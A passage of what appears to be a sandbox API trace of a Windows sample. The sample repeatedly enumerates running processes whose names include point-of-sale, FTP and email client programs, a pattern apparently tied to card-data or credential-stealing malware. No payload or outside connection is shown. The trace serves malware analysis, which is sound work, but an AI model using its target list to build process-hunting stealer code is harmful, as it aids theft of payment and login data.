returned 1 [0282.384] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0282.430] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0282.434] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0282.436] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0282.438] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0282.440] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0282.442] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0282.444] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0282.447] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0282.452] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0282.454] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0282.456] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0282.457] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0282.459] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0282.462] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0282.464] CloseHandle (hObject=0x21f8) returned 1 [0282.464] Sleep (dwMilliseconds=0x64) [0282.577] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0282.593] Process32First (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.595] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0282.597] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0282.599] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0282.601] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0282.603] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0282.609] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0282.611] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0282.613] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0282.615] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.617] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.619] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0282.672] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.674] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.676] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.678] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.680] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.685] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.688] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.689] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0282.691] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0282.693] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0282.696] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.703] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0282.705] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0282.707] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0282.708] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0282.710] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0282.712] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.763] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0282.765] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0282.767] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0282.768] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0282.770] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0282.772] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0282.773] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0282.775] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0282.776] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0282.780] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0282.782] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0282.783] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0282.785] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0282.787] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0282.788] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0282.790] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0282.792] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0282.796] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0282.797] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0282.799] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0282.801] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0282.802] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0282.804] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0282.805] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0282.875] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0282.878] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0282.880] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0282.883] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0282.900] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0282.904] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0282.906] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0282.908] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0282.910] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0282.912] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0282.914] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0282.919] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0282.921] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0282.923] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0282.924] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0282.926] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, 